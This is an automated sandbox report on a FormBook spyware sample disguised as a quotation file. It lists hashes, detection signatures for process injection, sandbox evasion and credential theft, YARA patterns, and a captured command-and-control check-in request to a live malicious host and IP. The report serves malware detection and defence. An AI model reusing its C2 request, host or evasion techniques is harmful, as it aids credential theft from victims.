Windows Analysis Report
RFQ 0400-ENPI-RQMA.exe

Overview

General Information

Sample name: RFQ 0400-ENPI-RQMA.exe
Analysis ID: 1430324
MD5: 73b6e5a11aff9e7bd681b55136c5fbcf
SHA1: d8113fa2bd2b2fa43f3920b93f9a5217b9cb69a2
SHA256: 3ca71ea7d01b1f1e3613781fcd68b47c09a159af5876c134065bef4d912917a6
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ 0400-ENPI-RQMA.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe" MD5: 73B6E5A11AFF9E7BD681B55136C5FBCF)
    • RFQ 0400-ENPI-RQMA.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe" MD5: 73B6E5A11AFF9E7BD681B55136C5FBCF)
      • KdcHSkcpIgYD.exe (PID: 6016 cmdline: "C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7840 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • KdcHSkcpIgYD.exe (PID: 4048 cmdline: "C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cf83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16552:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            Timestamp: 04/23/24-14:23:35.363733
            SID: 2855465
            Source Port: 49743
            Destination Port: 80
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: RFQ 0400-ENPI-RQMA.exe, ReversingLabs: Detection: 28%
            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: RFQ 0400-ENPI-RQMA.exe, Joe Sandbox ML: detected
            Source: RFQ 0400-ENPI-RQMA.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RFQ 0400-ENPI-RQMA.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: aYJw.pdb source: RFQ 0400-ENPI-RQMA.exe
            Source: Binary string: replace.pdb source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdcHSkcpIgYD.exe, 00000004.00000000.1853172112.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2897838287.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 0400-ENPI-RQMA.exe, RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: aYJw.pdbSHA256 source: RFQ 0400-ENPI-RQMA.exe
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe, Code function: 4x nop then jmp 07D87AD1h, 0_2_07D871E1

            Networking

            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 79.98.25.1:80
            Source: Joe Sandbox View, IP Address: 79.98.25.1
            Source: Joe Sandbox View, ASN Name: RACKRAYUABRakrejusLT
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic, HTTP traffic detected:
              GET /aleu/?lT2ltVXh=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&66=uX3d2 HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Host: www.maxiwalls.com
              Connection: close
              User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: unknown, DNS traffic detected: queries for: www.maxiwalls.com

            E-Banking Fraud

            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.32e5318.4.raw.unpack, HomeView.cs, Large array initialization: array initializer size 33604
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.7ae0000.11.raw.unpack, HomeView.cs, Large array initialization: array initializer size 33604
            Source: initial sample, Static PE information: Filename: RFQ 0400-ENPI-RQMA.exe
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_031D2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_031D2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_031D2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AD0 NtReadFile,LdrInitializeThunk,5_2_031D2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AF0 NtWriteFile,LdrInitializeThunk,5_2_031D2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F30 NtCreateSection,LdrInitializeThunk,5_2_031D2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FB0 NtResumeThread,LdrInitializeThunk,5_2_031D2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FE0 NtCreateFile,LdrInitializeThunk,5_2_031D2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_031D2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_031D2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_031D2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_031D2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_031D2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_031D2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_031D2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C60 NtCreateKey,LdrInitializeThunk,5_2_031D2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_031D2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D35C0 NtCreateMutant,LdrInitializeThunk,5_2_031D35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D39B0 NtGetContextThread,LdrInitializeThunk,5_2_031D39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2B80 NtQueryInformationFile,5_2_031D2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2AB0 NtWaitForSingleObject,5_2_031D2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F60 NtCreateProcessEx,5_2_031D2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2F90 NtProtectVirtualMemory,5_2_031D2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2FA0 NtQuerySection,5_2_031D2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2E30 NtWriteVirtualMemory,5_2_031D2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2EA0 NtAdjustPrivilegesToken,5_2_031D2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2D00 NtSetInformationFile,5_2_031D2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2DB0 NtEnumerateKey,5_2_031D2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2C00 NtQueryInformationProcess,5_2_031D2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CC0 NtQueryVirtualMemory,5_2_031D2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D2CF0 NtOpenProcess,5_2_031D2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3010 NtOpenDirectoryObject,5_2_031D3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3090 NtSetValueKey,5_2_031D3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3D10 NtOpenProcessToken,5_2_031D3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_031D3D70 NtOpenThread,5_2_031D3D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0320EA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 031E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0318B970 appears 262 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 031D5130 appears 58 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0321F290 appears 103 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 0143EA12 appears 86 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 01405130 appears 36 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 0144F290 appears 103 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 013BB970 appears 254 times
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: String function: 01417E54 appears 94 times
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: invalid certificate
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657413936.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657993465.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1663447736.0000000007AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1657755988.00000000031D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.00000000014BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exeBinary or memory string: OriginalFilenameaYJw.exe& vs RFQ 0400-ENPI-RQMA.exe
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.31d0000.0.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, rDIp5G8onoljg2aKqn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4f48240.10.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.4ec4620.9.raw.unpack, F6hFYiiBiVNM4n0oqc.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 0400-ENPI-RQMA.exe.log
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\replace.exeFile created: C:\Users\user\AppData\Local\Temp\C3vB7APK
            Source: RFQ 0400-ENPI-RQMA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
